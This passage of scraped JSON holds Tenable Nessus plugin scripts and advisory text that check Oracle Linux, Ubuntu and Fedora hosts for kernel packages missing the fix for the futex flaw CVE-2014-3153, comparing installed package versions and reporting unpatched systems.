"published": "2014-06-09T00:00:00", "title": "Oracle Linux 5 / 6 : Unbreakable Enterprise kernel (ELSA-2014-3039)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3153"], "modified": "2014-06-09T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:mlnx_en-2.6.32-400.36.2.el6uek", "p-cpe:/a:oracle:linux:mlnx_en-2.6.32-400.36.2.el5uekdebug", "p-cpe:/a:oracle:linux:ofa-2.6.32-400.36.2.el5uekdebug", "p-cpe:/a:oracle:linux:ofa-2.6.32-400.36.2.el5uek", "p-cpe:/a:oracle:linux:kernel-uek-firmware", "p-cpe:/a:oracle:linux:kernel-uek-doc", "p-cpe:/a:oracle:linux:ofa-2.6.32-400.36.2.el6uekdebug", "p-cpe:/a:oracle:linux:kernel-uek", "cpe:/o:oracle:linux:5", "p-cpe:/a:oracle:linux:ofa-2.6.32-400.36.2.el6uek", "p-cpe:/a:oracle:linux:kernel-uek-debug-devel", "p-cpe:/a:oracle:linux:kernel-uek-devel", "p-cpe:/a:oracle:linux:mlnx_en-2.6.32-400.36.2.el5uek", "p-cpe:/a:oracle:linux:mlnx_en-2.6.32-400.36.2.el6uekdebug", "p-cpe:/a:oracle:linux:kernel-uek-headers", "p-cpe:/a:oracle:linux:kernel-uek-debug"], "id": 
"ORACLELINUX_ELSA-2014-3039.NASL", "href": "https://www.tenable.com/plugins/nessus/74378", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2014-3039.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(74378);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2014-3153\");\n script_bugtraq_id(67906);\n\n script_name(english:\"Oracle Linux 5 / 6 : Unbreakable Enterprise kernel (ELSA-2014-3039)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Description of changes:\n\nkernel-uek\n[2.6.32-400.36.2.el6uek]\n- futex: Make lookup_pi_state more robust (Thomas Gleixner) [Orabug: \n18918736] {CVE-2014-3153}\n- futex: Always cleanup owner tid in unlock_pi (Thomas Gleixner) \n[Orabug: 18918736] {CVE-2014-3153}\n- futex: Validate atomic acquisition in futex_lock_pi_atomic() (Thomas \nGleixner) [Orabug: 18918736] {CVE-2014-3153}\n- futex: Forbid uaddr1 == uaddr2 in futex_requeue(..., requeue_pi=1) \n(Thomas Gleixner) [Orabug: 18918736] {CVE-2014-3153} {CVE-2014-3153}\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2014-June/004178.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2014-June/004179.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected unbreakable enterprise kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n 
script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Android \"Towelroot\" Futex Requeue Kernel Exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mlnx_en-2.6.32-400.36.2.el5uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mlnx_en-2.6.32-400.36.2.el5uekdebug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mlnx_en-2.6.32-400.36.2.el6uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mlnx_en-2.6.32-400.36.2.el6uekdebug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ofa-2.6.32-400.36.2.el5uek\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ofa-2.6.32-400.36.2.el5uekdebug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ofa-2.6.32-400.36.2.el6uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ofa-2.6.32-400.36.2.el6uekdebug\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/06/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/09\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5 / 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2014-3153\"); \n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for ELSA-2014-3039\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nkernel_major_minor = get_kb_item(\"Host/uname/major_minor\");\nif (empty_or_null(kernel_major_minor)) exit(1, \"Unable to determine kernel major-minor level.\");\nexpected_kernel_major_minor = \"2.6\";\nif (kernel_major_minor != expected_kernel_major_minor)\n audit(AUDIT_OS_NOT, \"running kernel level \" + expected_kernel_major_minor + \", it is running kernel level \" + kernel_major_minor);\n\nflag = 0;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-uek-2.6.32\") && rpm_check(release:\"EL5\", reference:\"kernel-uek-2.6.32-400.36.2.el5uek\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-uek-debug-2.6.32\") && rpm_check(release:\"EL5\", reference:\"kernel-uek-debug-2.6.32-400.36.2.el5uek\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-uek-debug-devel-2.6.32\") && rpm_check(release:\"EL5\", reference:\"kernel-uek-debug-devel-2.6.32-400.36.2.el5uek\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-uek-devel-2.6.32\") && rpm_check(release:\"EL5\", reference:\"kernel-uek-devel-2.6.32-400.36.2.el5uek\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-uek-doc-2.6.32\") && rpm_check(release:\"EL5\", reference:\"kernel-uek-doc-2.6.32-400.36.2.el5uek\")) flag++;\nif (rpm_exists(release:\"EL5\", 
rpm:\"kernel-uek-firmware-2.6.32\") && rpm_check(release:\"EL5\", reference:\"kernel-uek-firmware-2.6.32-400.36.2.el5uek\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-uek-headers-2.6.32\") && rpm_check(release:\"EL5\", reference:\"kernel-uek-headers-2.6.32-400.36.2.el5uek\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"mlnx_en-2.6.32-400.36.2.el5uek-1.5.7-2\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"mlnx_en-2.6.32-400.36.2.el5uekdebug-1.5.7-2\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"ofa-2.6.32-400.36.2.el5uek-1.5.1-4.0.58\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"ofa-2.6.32-400.36.2.el5uekdebug-1.5.1-4.0.58\")) flag++;\n\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-2.6.32\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-2.6.32-400.36.2.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-2.6.32\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-debug-2.6.32-400.36.2.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-devel-2.6.32\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-debug-devel-2.6.32-400.36.2.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-devel-2.6.32\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-devel-2.6.32-400.36.2.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-doc-2.6.32\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-doc-2.6.32-400.36.2.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-firmware-2.6.32\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-firmware-2.6.32-400.36.2.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-headers-2.6.32\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-headers-2.6.32-400.36.2.el6uek\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"mlnx_en-2.6.32-400.36.2.el6uek-1.5.7-0.1\")) flag++;\nif (rpm_check(release:\"EL6\", 
reference:\"mlnx_en-2.6.32-400.36.2.el6uekdebug-1.5.7-0.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"ofa-2.6.32-400.36.2.el6uek-1.5.1-4.0.58\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"ofa-2.6.32-400.36.2.el6uekdebug-1.5.1-4.0.58\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-23T18:54:05", "description": "Pinkie Pie discovered a flaw in the Linux kernel's futex subsystem. An\nunprivileged local user could exploit this flaw to cause a denial of\nservice (system crash) or gain administrative privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "published": "2014-06-06T00:00:00", "title": "Ubuntu 12.04 LTS : linux-lts-quantal vulnerability (USN-2237-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3153"], "modified": "2014-06-06T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-3.5-generic", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts"], "id": "UBUNTU_USN-2237-1.NASL", "href": "https://www.tenable.com/plugins/nessus/74357", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2237-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. 
Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(74357);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/22\");\n\n script_cve_id(\"CVE-2014-3153\");\n script_xref(name:\"USN\", value:\"2237-1\");\n\n script_name(english:\"Ubuntu 12.04 LTS : linux-lts-quantal vulnerability (USN-2237-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Pinkie Pie discovered a flaw in the Linux kernel's futex subsystem. An\nunprivileged local user could exploit this flaw to cause a denial of\nservice (system crash) or gain administrative privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2237-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected linux-image-3.5-generic package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Android \"Towelroot\" Futex Requeue Kernel Exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.5-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/06/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2014-2020 Canonical, Inc. / NASL script (C) 2014-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(12\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2014-3153\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-2237-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.5.0-51-generic\", pkgver:\"3.5.0-51.77~precise1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.5-generic\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-23T18:54:05", "description": "Pinkie Pie discovered a flaw in the Linux kernel's futex subsystem. 
An\nunprivileged local user could exploit this flaw to cause a denial of\nservice (system crash) or gain administrative privileges.\n(CVE-2014-3153)\n\nA flaw was discovered in the Linux kernel's IPC reference counting. An\nunprivileged local user could exploit this flaw to cause a denial of\nservice (OOM system crash). (CVE-2013-4483).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "published": "2014-06-06T00:00:00", "title": "Ubuntu 12.04 LTS : linux-lts-raring vulnerabilities (USN-2238-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3153", "CVE-2013-4483"], "modified": "2014-06-06T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-3.8-generic", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts"], "id": "UBUNTU_USN-2238-1.NASL", "href": "https://www.tenable.com/plugins/nessus/74358", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2238-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. 
Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(74358);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/22\");\n\n script_cve_id(\"CVE-2013-4483\", \"CVE-2014-3153\");\n script_bugtraq_id(63445);\n script_xref(name:\"USN\", value:\"2238-1\");\n\n script_name(english:\"Ubuntu 12.04 LTS : linux-lts-raring vulnerabilities (USN-2238-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Pinkie Pie discovered a flaw in the Linux kernel's futex subsystem. An\nunprivileged local user could exploit this flaw to cause a denial of\nservice (system crash) or gain administrative privileges.\n(CVE-2014-3153)\n\nA flaw was discovered in the Linux kernel's IPC reference counting. An\nunprivileged local user could exploit this flaw to cause a denial of\nservice (OOM system crash). (CVE-2013-4483).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2238-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected linux-image-3.8-generic package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Android \"Towelroot\" Futex Requeue Kernel Exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.8-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/11/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2014-2020 Canonical, Inc. / NASL script (C) 2014-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(12\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2013-4483\", \"CVE-2014-3153\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-2238-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.8.0-42-generic\", pkgver:\"3.8.0-42.62~precise1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.8-generic\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:12:55", "description": "The 3.14.6 stable update contains a number of important fixes across\nthe tree.\n\nNote that Tenable Network Security 
has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 14, "published": "2014-06-12T00:00:00", "title": "Fedora 20 : kernel-3.14.6-200.fc20 (2014-7128)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3940", "CVE-2014-3153"], "modified": "2014-06-12T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:kernel", "cpe:/o:fedoraproject:fedora:20"], "id": "FEDORA_2014-7128.NASL", "href": "https://www.tenable.com/plugins/nessus/74478", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-7128.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(74478);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-3153\", \"CVE-2014-3940\");\n script_bugtraq_id(67786, 67906);\n script_xref(name:\"FEDORA\", value:\"2014-7128\");\n\n script_name(english:\"Fedora 20 : kernel-3.14.6-200.fc20 (2014-7128)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The 3.14.6 stable update contains a number of important fixes across\nthe tree.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1103626\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1104097\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-June/134250.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b80bb35d\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Android \"Towelroot\" Futex Requeue Kernel Exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 
